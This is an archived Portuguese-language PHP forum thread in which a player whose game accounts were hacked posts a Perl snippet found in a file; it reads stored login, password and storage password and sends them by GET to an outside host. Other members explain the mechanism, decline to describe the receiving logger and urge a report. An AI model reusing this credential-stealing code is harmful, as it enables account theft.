Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

VongolaX

Receber dados

Por , em PHP

Recommended Posts

VongolaX    0

VongolaX
Postado

Hoje tive umas contas hackiadas em um jogo deu uma olhada e acho q descobrir como o cara fez pra hackiar

abrir um arquivo pelo bloco de notas e achei isso

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://levelupgamess.110mb.com/key_strokes.php?keylog=$usuario $senha $kafra");

 

Pelo que deu a entender ele pega o login e senha e envia pra um arquivo php ne isso?

Então minha dúvida eh como seria esse aquivo php pra armazenar os dados?? seria tipo um log ne?

Compartilhar este post

Link para o post
Compartilhar em outros sites

VongolaX    0

VongolaX
Postado

Oi!

 

Desculpe, mas qual o objetivo desse post?

Voce quer aprender a fazer o mesmo?

 

Pretendo denuciar o cara a desenvolvedora do jogo pois sei quem e o mesmo so que para isso preciso de provas, ai preciso aprender a fazer pra explicar direito a distribuidora do game

 

e não, não tenho intensão de prejudicar ninguem com isso apenas quero tentar recuperar o que eu perdi (tudo que eu conquistei em 2 anos de jogos) pode ate parecer idiotice isso mais 2 anos jogando suando pra um fdp vim e levar tudo..

o minimo que quero e que ele seja banido quem pude me ajudar falando mais o menos como seria o arquivo pra receber os dados

Compartilhar este post

Link para o post
Compartilhar em outros sites

InterPlanet    7

InterPlanet
Postado

Entendo!

 

Contudo creio que nao seja necessario explicar a desenvolvedora como o fato ocorreu, ja que e fato que ocorreu! Eles e que devem proteger melhor o servico.

 

Todavia, como voce mesmo disse:

 

Pelo que deu a entender ele pega o login e senha e envia pra um arquivo php ne isso?

Pelo script ai, é isso memso, eles capturam os dados e enviar pra essa pagina levelupgamess.110mb.com/key_strokes.php via GET. Agora pra decifrar como eles fazem e o que fazem com as informaçoes enviadas so tendo acesso ao script da pagina em questao, o que e inviavel se voce nao tem acesso ao servidor via FTP, por exemplo.

 

Eles podem, por exemplo, ter um script na pagina que manda os dados pro email do sacana que a escreveu... As possibilidades sao muitas.

 

Reitero, faça a denuncia com o que ja descobriu, o resto e com a desenvolvedora.

Compartilhar este post

Link para o post
Compartilhar em outros sites

Henrique Barcelos    290

Henrique Barcelos
Postado

O cara só ia conseguir receber os dados do servidor da LevelUp se ela os disponibilizasse para qualquer uma acessar, o que eu acho improvável.

 

Vai ver VOCÊ pegou um keylogger no SEU computador e foi hackeado...

Compartilhar este post

Link para o post
Compartilhar em outros sites

VongolaX    0

VongolaX
Postado

Entendo!

 

Contudo creio que nao seja necessario explicar a desenvolvedora como o fato ocorreu, ja que e fato que ocorreu! Eles e que devem proteger melhor o servico.

 

Todavia, como voce mesmo disse:

 

Pelo que deu a entender ele pega o login e senha e envia pra um arquivo php ne isso?

Pelo script ai, é isso memso, eles capturam os dados e enviar pra essa pagina levelupgamess.110mb.com/key_strokes.php via GET. Agora pra decifrar como eles fazem e o que fazem com as informaçoes enviadas so tendo acesso ao script da pagina em questao, o que e inviavel se voce nao tem acesso ao servidor via FTP, por exemplo.

 

Eles podem, por exemplo, ter um script na pagina que manda os dados pro email do sacana que a escreveu... As possibilidades sao muitas.

 

Reitero, faça a denuncia com o que ja descobriu, o resto e com a desenvolvedora.

 

Problema e que você não conhece a distribuidora e o serviço porco que ela presta, preciso de todas as provas possiveis pra quem sabe TALVEZ eu consiga alguma coisa =/

 

 

O cara só ia conseguir receber os dados do servidor da LevelUp se ela os disponibilizasse para qualquer uma acessar, o que eu acho improvável.

 

Vai ver VOCÊ pegou um keylogger no SEU computador e foi hackeado...

 

Key no pc acho que naum, muito dificil passar key por antivirus hj em dia.....

Compartilhar este post

Link para o post
Compartilhar em outros sites

Henrique Barcelos    290

Henrique Barcelos
Postado
Key no pc acho que naum, muito dificil passar key por antivirus hj em dia.....

 

Vai nessa... Anti-virus são como vacinas vencidas, os crackers estão sempre a frente...

Compartilhar este post

Link para o post
Compartilhar em outros sites

Henrique Barcelos    290

Henrique Barcelos
Postado

É improvável, pra não dizer impossível que uma empresa como a LevelUp disponibilize dados de usuário para acesso externo...

 

E eu já falei que antivirus são vacinas vencidas... Pode passar 30 diferentes aí que não vai adiantar...

É um dos motivos pra eu não querer jogar nenhum jogo online... Você vira um alvo fácil...

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos PHP
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito